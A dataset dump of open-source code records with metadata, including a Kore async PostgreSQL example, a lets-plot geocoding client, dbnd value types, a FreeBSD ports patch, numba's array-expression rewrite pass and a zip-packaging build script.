Each record in this dump has the following columns (ranges are the min/max observed across the split; ⌀ marks nullable columns):

| column | type | observed range |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 4 to 721 |
| content_id | string | length 40 |
| detected_licenses | list | 0 to 57 items |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 91 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 321 classes |
| visit_date | timestamp[ns] | 2016-08-12 09:31:09 to 2023-09-06 10:45:07 |
| revision_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| committer_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| github_id | int64 | 426 to 681M |
| star_events_count | int64 | 101 to 243k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[ns] ⌀ | 2012-06-28 18:51:49 to 2023-09-14 21:59:16 |
| gha_created_at | timestamp[ns] ⌀ | 2008-02-11 22:55:26 to 2023-08-10 11:14:58 |
| gha_language | string | 147 classes |
| src_encoding | string | 26 classes |
| language | string | 2 classes |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 6 to 10.2M |
| extension | string | 115 classes |
| filename | string | length 3 to 113 |
| content | string | length 6 to 10.2M |
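A minimal sketch of iterating over records with this schema, assuming the Hugging Face `datasets` library is available; the dataset path is a hypothetical placeholder, not the real identifier:

```python
# Sketch only: streaming over a code dataset with the schema above.
# "org/code-dataset" is a hypothetical placeholder path.
from datasets import load_dataset

ds = load_dataset("org/code-dataset", split="train", streaming=True)
for record in ds.take(3):
    print(record["repo_name"], record["path"], record["length_bytes"])
```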
---
repo_name: jorisvink/kore | branch_name: refs/heads/master | path: /examples/python-pgsql/app.py | filename: app.py | extension: py | length_bytes: 2,024
blob_id: 2bd509785762d20197fe360b4a3b83a7a260de09 | directory_id: 35404d163c883a4e73b638b9c01096b67c6cafc7 | content_id: d0fb670dd98bff11d9c11ad2a94966df9e8aec51
snapshot_id: d7035e599827f1ad906f4281d587b0c319d44d44 | revision_id: 92e1ffcc10845a78775e02c8fe4486a616cd137d
detected_licenses: ["ISC"] | license_type: permissive | gha_license_id: ISC
visit_date: 2023-04-28T21:45:41.821137 | revision_date: 2023-04-15T08:03:31 | committer_date: 2023-04-15T08:03:31
github_id: 10,504,702 | star_events_count: 3,777 | fork_events_count: 477
gha_event_created_at: 2023-04-06T05:57:45 | gha_created_at: 2013-06-05T14:37:22 | gha_language: C
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
#
# Copyright (c) 2017-2018 Joris Vink <joris@coders.se>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#

# Asynchronous postgresql queries with Python.

import json
import kore


class KoreApp:
    def configure(self, args):
        # Register the path to our database when Kore starts.
        kore.dbsetup("db", "host=/tmp dbname=test")

    # A handler that returns 200 OK with hello as body.
    def hello(self, req):
        req.response(200, b'hello\n')

    #
    # The query handler that fires off the query and returns a coroutine.
    #
    # Kore will resume this handler when the query returns a result or
    # is successful.
    #
    # The kore.pgsql() method can throw exceptions, most notably a
    # GeneratorExit in case the client connection went away before
    # the query was able to be completed.
    #
    # In this example we're not doing any exception handling.
    #
    async def query(self, req):
        result = await kore.dbquery("db", "SELECT * FROM coders")
        req.response(200, json.dumps(result).encode("utf-8"))

    #
    # A slow query that returns after 10 seconds.
    #
    async def slow(self, req):
        result = await kore.dbquery("db", "SELECT * FROM pg_sleep(10)")
        req.response(200, json.dumps(result).encode("utf-8"))


# Set the application Kore will run to our class.
koreapp = KoreApp()
```
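Once Kore is running this app, the handlers can be exercised over HTTP. A minimal smoke-test sketch, assuming the handlers are routed at /hello and /query and the server listens on localhost:8888; both are assumptions, since the routing lives in the app's Kore configuration, which is not part of this record:

```python
# Hypothetical smoke test against a locally running Kore instance.
# Host, port, and route names are assumptions, not taken from this record.
import urllib.request

for route in ("hello", "query"):
    with urllib.request.urlopen(f"http://127.0.0.1:8888/{route}") as resp:
        print(route, resp.status, resp.read()[:60])
```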
---
repo_name: JetBrains/lets-plot | branch_name: refs/heads/master | path: /python-package/lets_plot/geo_data/gis/geocoding_service.py | filename: geocoding_service.py | extension: py | length_bytes: 1,652
blob_id: a1e942fa2c78a0274771a8885f1c0db39ba81d8e | directory_id: d01680fe164d915bb3ffd6b10dea1d7cac503630 | content_id: eea61087320a92c6f06747770bc45d60aae3f029
snapshot_id: 4ba8edd8910967d5e15d8d0ea1a9cd7a9c50432f | revision_id: af4f6554eb9cc250259a6a6757b5c8d920dde8c4
detected_licenses: ["MIT", "Apache-2.0", "LGPL-2.0-or-later", "BSD-3-Clause", "LGPL-3.0-only"] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-09-01T04:15:04.414149 | revision_date: 2023-08-31T16:48:57 | committer_date: 2023-08-31T16:48:57
github_id: 176,771,727 | star_events_count: 1,264 | fork_events_count: 59
gha_event_created_at: 2023-09-07T12:42:01 | gha_created_at: 2019-03-20T16:13:03 | gha_language: Kotlin
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
import gzip
import json
import urllib.parse
import urllib.request
from urllib.error import HTTPError

from .json_request import RequestFormatter
from .json_response import ResponseParser
from .request import Request
from .response import Response
from lets_plot._global_settings import has_global_value, get_global_str, GEOCODING_ROUTE
from lets_plot.settings_utils import GEOCODING_PROVIDER_URL


class GeocodingService:
    def do_request(self, request: Request) -> Response:
        if not has_global_value(GEOCODING_PROVIDER_URL):
            raise ValueError('Geocoding server url is not defined')

        try:
            request_json = RequestFormatter().format(request).to_dict()
            request_str = json.dumps(request_json)
            request = urllib.request.Request(
                url=get_global_str(GEOCODING_PROVIDER_URL) + GEOCODING_ROUTE,
                headers={'Content-Type': 'application/json', 'Accept-Encoding': 'gzip'},
                method='POST',
                data=bytearray(request_str, 'utf-8')
            )
            response = urllib.request.urlopen(request)
            if response.info().get('Content-Encoding') == 'gzip':
                content = response.read()
                response_str = gzip.decompress(content).decode('utf-8')
            else:
                response_str = response.read().decode('utf-8')
            response_json = json.loads(response_str)
            return ResponseParser().parse(response_json)
        except HTTPError as e:
            raise ValueError(
                'Geocoding server connection failure: {} {} ({})'.format(e.code, e.msg, e.filename)) from None
```
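The gzip negotiation in do_request is self-contained enough to demonstrate outside lets-plot. A standalone sketch of the same pattern, using a public echo endpoint purely for illustration:

```python
# Standalone sketch of the gzip-aware urllib pattern used in do_request above.
import gzip
import urllib.request

req = urllib.request.Request("https://httpbin.org/gzip",
                             headers={'Accept-Encoding': 'gzip'})
with urllib.request.urlopen(req) as response:
    body = response.read()
    if response.info().get('Content-Encoding') == 'gzip':
        body = gzip.decompress(body)
print(body.decode('utf-8')[:80])
```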
---
repo_name: databand-ai/dbnd | branch_name: refs/heads/develop | path: /modules/dbnd/src/dbnd/_core/parameter/value_types/task_value.py | filename: task_value.py | extension: py | length_bytes: 2,488
blob_id: bc13384d374452cedc3064c908fbad60c16b8e7a | directory_id: b7163b44b679e082fe97cf7fcd0c73b2fcdb38eb | content_id: 60949d4f7f591e9b83c44c821d6c688de9068ad8
snapshot_id: 70c95d95e12bfb8ab471a6dce27691ed658cb92d | revision_id: d59c99dcdcd280d7eec36a693dd80f8c8c831ea2
detected_licenses: ["Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-06-24T18:07:56.524526 | revision_date: 2023-05-28T07:57:36 | committer_date: 2023-05-28T07:57:36
github_id: 231,361,064 | star_events_count: 257 | fork_events_count: 33
gha_event_created_at: 2023-08-06T08:30:28 | gha_created_at: 2020-01-02T10:42:47 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
# © Copyright Databand.ai, an IBM Company 2022

from dbnd._core.constants import _TaskParamContainer
from dbnd._core.current import get_settings
from dbnd._core.task import Config
from dbnd._core.task_build.task_registry import (
    build_task_from_config,
    get_task_registry,
)
from targets.values import ValueType


class TaskValueType(ValueType):
    """
    A value that takes another databand task class.

    When used programmatically, the parameter should be specified
    directly with the :py:class:`dbnd.tasks.Task` (sub) class. Like
    ``MyMetaTask(my_task_param=my_tasks.MyTask)``. On the command line,
    you specify the :py:meth:`dbnd.tasks.Task.get_task_family`. Like

    .. code-block:: console

        $ dbnd --module my_tasks MyMetaTask --my_task_param my_namespace.MyTask

    Where ``my_namespace.MyTask`` is defined in the ``my_tasks`` python module.

    When the :py:class:`dbnd.tasks.Task` class is instantiated to an object,
    the value will always be a task class (and not a string).
    """

    type = _TaskParamContainer

    def parse_from_str(self, input):
        """
        Parse a task_family using the :class:`~dbnd._core.register.Register`
        """
        task_cls = get_task_registry().get_task_cls(input)
        return task_cls()

    def to_str(self, cls):
        """
        Converts the :py:class:`dbnd.tasks.Task` (sub) class to its family name.
        """
        return cls.get_task_family()

    def is_type_of(self, value):
        return isinstance(value, _TaskParamContainer)


class ConfigValueType(ValueType):
    type = Config
    support_from_str = True

    def __init__(self, config_cls):
        self.config_cls = config_cls

    def parse_from_str(self, input):
        """
        Parse a task_family using the :class:`~dbnd._core.register.Register`
        """
        from dbnd._core.settings.env import EnvConfig

        if isinstance(self.config_cls, EnvConfig):
            return get_settings().get_env_config(input)
        return build_task_from_config(input, expected_type=self.config_cls)

    def to_str(self, x):
        """
        Converts the :py:class:`dbnd.tasks.Task` (sub) class to its family name.
        """
        if x:
            return x.task_name
        return super(ConfigValueType, self).to_str(x)

    def is_type_of(self, value):
        return isinstance(value, Config)

    def to_repr(self, x):
        if x:
            return '"%s"' % x.task_name
        return "None"
```
---
repo_name: freebsd/freebsd-ports | branch_name: refs/heads/main | path: /cad/cura/files/patch-cura__app.py | filename: patch-cura__app.py | extension: py | length_bytes: 234
blob_id: f80c7b4b8777f54c7fe75b2a16df3b95815c09cb | directory_id: e65a4dbfbfb0e54e59787ba7741efee12f7687f3 | content_id: 519db77135670a1d8940ee2d6e09473c6ba7fabd
snapshot_id: 86f2e89d43913412c4f6b2be3e255bc0945eac12 | revision_id: 605a2983f245ac63f5420e023e7dce56898ad801
detected_licenses: ["BSD-2-Clause"] | license_type: permissive | gha_license_id: NOASSERTION
visit_date: 2023-08-30T21:46:28.720924 | revision_date: 2023-08-30T19:33:44 | committer_date: 2023-08-30T19:33:44
github_id: 1,803,961 | star_events_count: 916 | fork_events_count: 918
gha_event_created_at: 2023-09-08T04:06:26 | gha_created_at: 2011-05-26T11:15:35 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```diff
--- cura_app.py.orig	2020-02-28 16:06:57 UTC
+++ cura_app.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python3.8
+#!/usr/bin/env %%PYTHON_CMD%%
 
 # Copyright (c) 2022 Ultimaker B.V.
 # Cura is released under the terms of the LGPLv3 or higher.
```
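This is a FreeBSD ports patch: it swaps the hard-coded shebang for a %%PYTHON_CMD%% placeholder so the port's build can later substitute the interpreter it was configured with (PYTHON_CMD is the standard ports variable for this). A toy illustration of that substitution; the concrete interpreter value is hypothetical:

```python
# Toy illustration of ports-style placeholder substitution; "python3.9" is
# a hypothetical value chosen by the ports framework, not by this patch.
shebang = "#!/usr/bin/env %%PYTHON_CMD%%"
print(shebang.replace("%%PYTHON_CMD%%", "python3.9"))  # -> #!/usr/bin/env python3.9
```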
---
repo_name: numba/numba | branch_name: refs/heads/main | path: /numba/np/ufunc/array_exprs.py | filename: array_exprs.py | extension: py | length_bytes: 16,873
blob_id: 145cca8dd98cd60f14c9b31ae66ef0ce60d44710 | directory_id: 29f18e8ddde0379cef7fa00b1a50058be3cafa79 | content_id: 458c06e636d1efe245f0396650113aaf11d055d2
snapshot_id: 9a8345ff5f7d57f0ffec40e39941ebf2684df0d1 | revision_id: 46059957ad416e68476d1e5f32ccd59f7d5df2bb
detected_licenses: ["LicenseRef-scancode-secret-labs-2011", "BSD-3-Clause", "LicenseRef-scancode-python-cwi", "LicenseRef-scancode-free-unknown", "GPL-1.0-or-later", "LicenseRef-scancode-other-copyleft", "MIT", "LicenseRef-scancode-unknown-license-reference", "Python-2.0", "BSD-2-Clause"] | license_type: permissive | gha_license_id: BSD-2-Clause
visit_date: 2023-08-09T22:29:38.170300 | revision_date: 2023-08-07T15:00:27 | committer_date: 2023-08-07T15:00:27
github_id: 3,659,275 | star_events_count: 8,247 | fork_events_count: 1,151
gha_event_created_at: 2023-09-13T14:43:48 | gha_created_at: 2012-03-08T11:12:43 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
import ast
from collections import defaultdict, OrderedDict
import contextlib
import sys
from types import SimpleNamespace

import numpy as np
import operator

from numba.core import types, targetconfig, ir, rewrites, compiler
from numba.core.typing import npydecl
from numba.np.ufunc.dufunc import DUFunc


def _is_ufunc(func):
    return isinstance(func, (np.ufunc, DUFunc))


@rewrites.register_rewrite('after-inference')
class RewriteArrayExprs(rewrites.Rewrite):
    '''The RewriteArrayExprs class is responsible for finding array
    expressions in Numba intermediate representation code, and
    rewriting those expressions to a single operation that will expand
    into something similar to a ufunc call.
    '''
    def __init__(self, state, *args, **kws):
        super(RewriteArrayExprs, self).__init__(state, *args, **kws)
        # Install a lowering hook if we are using this rewrite.
        special_ops = state.targetctx.special_ops
        if 'arrayexpr' not in special_ops:
            special_ops['arrayexpr'] = _lower_array_expr

    def match(self, func_ir, block, typemap, calltypes):
        """
        Using typing and a basic block, search the basic block for array
        expressions.
        Return True when one or more matches were found, False otherwise.
        """
        # We can trivially reject everything if there are no
        # calls in the type results.
        if len(calltypes) == 0:
            return False

        self.crnt_block = block
        self.typemap = typemap
        # { variable name: IR assignment (of a function call or operator) }
        self.array_assigns = OrderedDict()
        # { variable name: IR assignment (of a constant) }
        self.const_assigns = {}

        assignments = block.find_insts(ir.Assign)
        for instr in assignments:
            target_name = instr.target.name
            expr = instr.value
            # Does it assign an expression to an array variable?
            if (isinstance(expr, ir.Expr) and
                    isinstance(typemap.get(target_name, None), types.Array)):
                self._match_array_expr(instr, expr, target_name)
            elif isinstance(expr, ir.Const):
                # Track constants since we might need them for an
                # array expression.
                self.const_assigns[target_name] = expr

        return len(self.array_assigns) > 0

    def _match_array_expr(self, instr, expr, target_name):
        """
        Find whether the given assignment (*instr*) of an expression (*expr*)
        to variable *target_name* is an array expression.
        """
        # We've matched a subexpression assignment to an
        # array variable. Now see if the expression is an
        # array expression.
        expr_op = expr.op
        array_assigns = self.array_assigns

        if ((expr_op in ('unary', 'binop')) and (
                expr.fn in npydecl.supported_array_operators)):
            # It is an array operator that maps to a ufunc.
            # check that all args have internal types
            if all(self.typemap[var.name].is_internal
                   for var in expr.list_vars()):
                array_assigns[target_name] = instr
        elif ((expr_op == 'call') and (expr.func.name in self.typemap)):
            # It could be a match for a known ufunc call.
            func_type = self.typemap[expr.func.name]
            if isinstance(func_type, types.Function):
                func_key = func_type.typing_key
                if _is_ufunc(func_key):
                    # If so, check whether an explicit output is passed.
                    if not self._has_explicit_output(expr, func_key):
                        # If not, match it as a (sub)expression.
                        array_assigns[target_name] = instr

    def _has_explicit_output(self, expr, func):
        """
        Return whether the *expr* call to *func* (a ufunc) features an
        explicit output argument.
        """
        nargs = len(expr.args) + len(expr.kws)
        if expr.vararg is not None:
            # XXX *args unsupported here, assume there may be an explicit
            # output
            return True
        return nargs > func.nin

    def _get_array_operator(self, ir_expr):
        ir_op = ir_expr.op
        if ir_op in ('unary', 'binop'):
            return ir_expr.fn
        elif ir_op == 'call':
            return self.typemap[ir_expr.func.name].typing_key
        raise NotImplementedError(
            "Don't know how to find the operator for '{0}' expressions.".format(
                ir_op))

    def _get_operands(self, ir_expr):
        '''Given a Numba IR expression, return the operands to the expression
        in order they appear in the expression.
        '''
        ir_op = ir_expr.op
        if ir_op == 'binop':
            return ir_expr.lhs, ir_expr.rhs
        elif ir_op == 'unary':
            return ir_expr.list_vars()
        elif ir_op == 'call':
            return ir_expr.args
        raise NotImplementedError(
            "Don't know how to find the operands for '{0}' expressions.".format(
                ir_op))

    def _translate_expr(self, ir_expr):
        '''Translate the given expression from Numba IR to an array expression
        tree.
        '''
        ir_op = ir_expr.op
        if ir_op == 'arrayexpr':
            return ir_expr.expr
        operands_or_args = [self.const_assigns.get(op_var.name, op_var)
                            for op_var in self._get_operands(ir_expr)]
        return self._get_array_operator(ir_expr), operands_or_args

    def _handle_matches(self):
        '''Iterate over the matches, trying to find which instructions should
        be rewritten, deleted, or moved.
        '''
        replace_map = {}
        dead_vars = set()
        used_vars = defaultdict(int)
        for instr in self.array_assigns.values():
            expr = instr.value
            arr_inps = []
            arr_expr = self._get_array_operator(expr), arr_inps
            new_expr = ir.Expr(op='arrayexpr',
                               loc=expr.loc,
                               expr=arr_expr,
                               ty=self.typemap[instr.target.name])
            new_instr = ir.Assign(new_expr, instr.target, instr.loc)
            replace_map[instr] = new_instr
            self.array_assigns[instr.target.name] = new_instr
            for operand in self._get_operands(expr):
                operand_name = operand.name
                if operand.is_temp and operand_name in self.array_assigns:
                    child_assign = self.array_assigns[operand_name]
                    child_expr = child_assign.value
                    child_operands = child_expr.list_vars()
                    for operand in child_operands:
                        used_vars[operand.name] += 1
                    arr_inps.append(self._translate_expr(child_expr))
                    if child_assign.target.is_temp:
                        dead_vars.add(child_assign.target.name)
                        replace_map[child_assign] = None
                elif operand_name in self.const_assigns:
                    arr_inps.append(self.const_assigns[operand_name])
                else:
                    used_vars[operand.name] += 1
                    arr_inps.append(operand)
        return replace_map, dead_vars, used_vars

    def _get_final_replacement(self, replacement_map, instr):
        '''Find the final replacement instruction for a given initial
        instruction by chasing instructions in a map from instructions
        to replacement instructions.
        '''
        replacement = replacement_map[instr]
        while replacement in replacement_map:
            replacement = replacement_map[replacement]
        return replacement

    def apply(self):
        '''When we've found array expressions in a basic block, rewrite that
        block, returning a new, transformed block.
        '''
        # Part 1: Figure out what instructions should be rewritten
        # based on the matches found.
        replace_map, dead_vars, used_vars = self._handle_matches()
        # Part 2: Using the information above, rewrite the target
        # basic block.
        result = self.crnt_block.copy()
        result.clear()
        delete_map = {}
        for instr in self.crnt_block.body:
            if isinstance(instr, ir.Assign):
                if instr in replace_map:
                    replacement = self._get_final_replacement(
                        replace_map, instr)
                    if replacement:
                        result.append(replacement)
                        for var in replacement.value.list_vars():
                            var_name = var.name
                            if var_name in delete_map:
                                result.append(delete_map.pop(var_name))
                            if used_vars[var_name] > 0:
                                used_vars[var_name] -= 1
                else:
                    result.append(instr)
            elif isinstance(instr, ir.Del):
                instr_value = instr.value
                if used_vars[instr_value] > 0:
                    used_vars[instr_value] -= 1
                    delete_map[instr_value] = instr
                elif instr_value not in dead_vars:
                    result.append(instr)
            else:
                result.append(instr)
        if delete_map:
            for instr in delete_map.values():
                result.insert_before_terminator(instr)
        return result


_unaryops = {
    operator.pos: ast.UAdd,
    operator.neg: ast.USub,
    operator.invert: ast.Invert,
}

_binops = {
    operator.add: ast.Add,
    operator.sub: ast.Sub,
    operator.mul: ast.Mult,
    operator.truediv: ast.Div,
    operator.mod: ast.Mod,
    operator.or_: ast.BitOr,
    operator.rshift: ast.RShift,
    operator.xor: ast.BitXor,
    operator.lshift: ast.LShift,
    operator.and_: ast.BitAnd,
    operator.pow: ast.Pow,
    operator.floordiv: ast.FloorDiv,
}

_cmpops = {
    operator.eq: ast.Eq,
    operator.ne: ast.NotEq,
    operator.lt: ast.Lt,
    operator.le: ast.LtE,
    operator.gt: ast.Gt,
    operator.ge: ast.GtE,
}


def _arr_expr_to_ast(expr):
    '''Build a Python expression AST from an array expression built by
    RewriteArrayExprs.
    '''
    if isinstance(expr, tuple):
        op, arr_expr_args = expr
        ast_args = []
        env = {}
        for arg in arr_expr_args:
            ast_arg, child_env = _arr_expr_to_ast(arg)
            ast_args.append(ast_arg)
            env.update(child_env)
        if op in npydecl.supported_array_operators:
            if len(ast_args) == 2:
                if op in _binops:
                    return ast.BinOp(
                        ast_args[0], _binops[op](), ast_args[1]), env
                if op in _cmpops:
                    return ast.Compare(
                        ast_args[0], [_cmpops[op]()], [ast_args[1]]), env
            else:
                assert op in _unaryops
                return ast.UnaryOp(_unaryops[op](), ast_args[0]), env
        elif _is_ufunc(op):
            fn_name = "__ufunc_or_dufunc_{0}".format(
                hex(hash(op)).replace("-", "_"))
            fn_ast_name = ast.Name(fn_name, ast.Load())
            env[fn_name] = op  # Stash the ufunc or DUFunc in the environment
            ast_call = ast.Call(fn_ast_name, ast_args, [])
            return ast_call, env
    elif isinstance(expr, ir.Var):
        return ast.Name(expr.name, ast.Load(),
                        lineno=expr.loc.line,
                        col_offset=expr.loc.col if expr.loc.col else 0), {}
    elif isinstance(expr, ir.Const):
        return ast.Num(expr.value), {}
    raise NotImplementedError(
        "Don't know how to translate array expression '%r'" % (expr,))


@contextlib.contextmanager
def _legalize_parameter_names(var_list):
    """
    Legalize names in the variable list for use as a Python function's
    parameter names.
    """
    var_map = OrderedDict()
    for var in var_list:
        old_name = var.name
        new_name = var.scope.redefine(old_name, loc=var.loc).name
        new_name = new_name.replace("$", "_").replace(".", "_")
        # Caller should ensure the names are unique
        if new_name in var_map:
            raise AssertionError(f"{new_name!r} not unique")
        var_map[new_name] = var, old_name
        var.name = new_name
    param_names = list(var_map)
    try:
        yield param_names
    finally:
        # Make sure the old names are restored, to avoid confusing
        # other parts of Numba (see issue #1466)
        for var, old_name in var_map.values():
            var.name = old_name


class _EraseInvalidLineRanges(ast.NodeTransformer):
    def generic_visit(self, node: ast.AST) -> ast.AST:
        node = super().generic_visit(node)
        if hasattr(node, "lineno"):
            if getattr(node, "end_lineno", None) is not None:
                if node.lineno > node.end_lineno:
                    del node.lineno
                    del node.end_lineno
        return node


def _fix_invalid_lineno_ranges(astree: ast.AST):
    """Inplace fixes invalid lineno ranges.
    """
    # Make sure lineno and end_lineno are present
    ast.fix_missing_locations(astree)
    # Delete invalid lineno ranges
    _EraseInvalidLineRanges().visit(astree)
    # Make sure lineno and end_lineno are present
    ast.fix_missing_locations(astree)


def _lower_array_expr(lowerer, expr):
    '''Lower an array expression built by RewriteArrayExprs.
    '''
    expr_name = "__numba_array_expr_%s" % (hex(hash(expr)).replace("-", "_"))
    expr_filename = expr.loc.filename
    expr_var_list = expr.list_vars()
    # The expression may use a given variable several times, but we
    # should only create one parameter for it.
    expr_var_unique = sorted(set(expr_var_list), key=lambda var: var.name)

    # Arguments are the names external to the new closure
    expr_args = [var.name for var in expr_var_unique]

    # 1. Create an AST tree from the array expression.
    with _legalize_parameter_names(expr_var_unique) as expr_params:
        ast_args = [ast.arg(param_name, None)
                    for param_name in expr_params]
        # Parse a stub function to ensure the AST is populated with
        # reasonable defaults for the Python version.
        ast_module = ast.parse('def {0}(): return'.format(expr_name),
                               expr_filename, 'exec')
        assert hasattr(ast_module, 'body') and len(ast_module.body) == 1
        ast_fn = ast_module.body[0]
        ast_fn.args.args = ast_args
        ast_fn.body[0].value, namespace = _arr_expr_to_ast(expr.expr)
        _fix_invalid_lineno_ranges(ast_module)

    # 2. Compile the AST module and extract the Python function.
    code_obj = compile(ast_module, expr_filename, 'exec')
    exec(code_obj, namespace)
    impl = namespace[expr_name]

    # 3. Now compile a ufunc using the Python function as kernel.
    context = lowerer.context
    builder = lowerer.builder
    outer_sig = expr.ty(*(lowerer.typeof(name) for name in expr_args))
    inner_sig_args = []
    for argty in outer_sig.args:
        if isinstance(argty, types.Optional):
            argty = argty.type
        if isinstance(argty, types.Array):
            inner_sig_args.append(argty.dtype)
        else:
            inner_sig_args.append(argty)
    inner_sig = outer_sig.return_type.dtype(*inner_sig_args)

    flags = targetconfig.ConfigStack().top_or_none()
    flags = compiler.Flags() if flags is None else flags.copy()  # make sure it's a clone or a fresh instance
    # Follow the Numpy error model. Note this also allows e.g. vectorizing
    # division (issue #1223).
    flags.error_model = 'numpy'
    cres = context.compile_subroutine(builder, impl, inner_sig, flags=flags,
                                      caching=False)

    # Create kernel subclass calling our native function
    from numba.np import npyimpl

    class ExprKernel(npyimpl._Kernel):
        def generate(self, *args):
            arg_zip = zip(args, self.outer_sig.args, inner_sig.args)
            cast_args = [self.cast(val, inty, outty)
                         for val, inty, outty in arg_zip]
            result = self.context.call_internal(
                builder, cres.fndesc, inner_sig, cast_args)
            return self.cast(result, inner_sig.return_type,
                             self.outer_sig.return_type)

    # create a fake ufunc object which is enough to trick numpy_ufunc_kernel
    ufunc = SimpleNamespace(nin=len(expr_args), nout=1, __name__=expr_name)
    ufunc.nargs = ufunc.nin + ufunc.nout

    args = [lowerer.loadvar(name) for name in expr_args]
    return npyimpl.numpy_ufunc_kernel(
        context, builder, outer_sig, args, ufunc, ExprKernel)
```
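The rewrite registered above is what lets Numba fuse a whole array expression into a single kernel instead of materializing each intermediate array. A small demonstration of the user-visible effect, assuming numba and numpy are installed:

```python
# Minimal sketch: inside an @njit function, a * b + c is one array
# expression; RewriteArrayExprs collapses it into a single 'arrayexpr'
# operation, which _lower_array_expr compiles as a fused elementwise kernel.
import numpy as np
from numba import njit

@njit
def fused(a, b, c):
    return a * b + c  # no temporary array allocated for a * b

x = np.arange(5.0)
print(fused(x, x, x))  # [ 0.  2.  6. 12. 20.]
```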
---
repo_name: jvolkman/intellij-protobuf-editor | branch_name: refs/heads/master | path: /build_support/build_defs/zip_plugin_files.py | filename: zip_plugin_files.py | extension: py | length_bytes: 1,956
blob_id: 5d507788cb310a6c07ab23ba726000b5b74d0ba0 | directory_id: 1cb67c06be9a6a0991629a332ca1271f46a1b7dd | content_id: 23866045a25456492a8a2a5023d128953549472c
snapshot_id: 4517d4c86dbb6c5f71f2e77592297700cad92241 | revision_id: 6feb43d3b7d84d2743d108d9026f756bd90cb928
detected_licenses: ["Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2021-06-24T01:22:42.892474 | revision_date: 2021-06-02T16:03:56 | committer_date: 2021-06-02T16:03:56
github_id: 223,668,220 | star_events_count: 146 | fork_events_count: 15
gha_event_created_at: 2021-04-12T17:24:45 | gha_created_at: 2019-11-23T23:43:16 | gha_language: Java
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
#!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Packages plugin files into a zip archive."""

import argparse
import os
import stat
import zipfile

# Keep this script executable from python2 in the host configuration.
# Python2's open() does not have the "encoding" parameter.
from io import open  # pylint: disable=redefined-builtin,g-bad-import-order,g-importing-member

try:
    from itertools import izip  # pylint: disable=g-importing-member,g-import-not-at-top
except ImportError:
    # Python 3.x already has a built-in `zip` that takes `izip`'s place.
    izip = zip

parser = argparse.ArgumentParser()
parser.add_argument("--output", help="The output filename.", required=True)
parser.add_argument(
    "files_to_zip", nargs="+", help="Sequence of exec_path, zip_path... pairs"
)


def pairwise(t):
    it = iter(t)
    return izip(it, it)


def main():
    args = parser.parse_args()
    with zipfile.ZipFile(args.output, "w") as outfile:
        for exec_path, zip_path in pairwise(args.files_to_zip):
            with open(exec_path, mode="rb") as input_file:
                zipinfo = zipfile.ZipInfo(zip_path, (2000, 1, 1, 0, 0, 0))
                filemode = stat.S_IMODE(os.fstat(input_file.fileno()).st_mode)
                zipinfo.external_attr = filemode << 16
                outfile.writestr(zipinfo, input_file.read(), zipfile.ZIP_DEFLATED)


if __name__ == "__main__":
    main()
```
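The pairwise helper is the only subtle part: zipping one iterator against itself consumes two items per step, so the flat positional-argument list pairs up as (exec_path, zip_path). A quick check of that behavior:

```python
# The zip-of-one-iterator trick: consecutive elements become pairs.
def pairwise(t):
    it = iter(t)
    return zip(it, it)

assert list(pairwise(["bin/a", "plugin/a", "bin/b", "plugin/lib/b"])) == [
    ("bin/a", "plugin/a"),
    ("bin/b", "plugin/lib/b"),
]
```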
---
repo_name: JetBrains/intellij-community | branch_name: refs/heads/master | path: /python/testData/quickFixes/PyMakeFunctionReturnTypeQuickFixTest/lambda_after.py | filename: lambda_after.py | extension: py | length_bytes: 101
blob_id: 7ff2f49233bc9a2716f4d795d134e13c8693b98c | directory_id: eb9f655206c43c12b497c667ba56a0d358b6bc3a | content_id: 9fcb5446e72ab271ab892cc5d01f7b0d6741b4f6
snapshot_id: 2ed226e200ecc17c037dcddd4a006de56cd43941 | revision_id: 05dbd4575d01a213f3f4d69aa4968473f2536142
detected_licenses: ["Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-09-03T17:06:37.560889 | revision_date: 2023-09-03T11:51:00 | committer_date: 2023-09-03T12:12:27
github_id: 2,489,216 | star_events_count: 16,288 | fork_events_count: 6,635
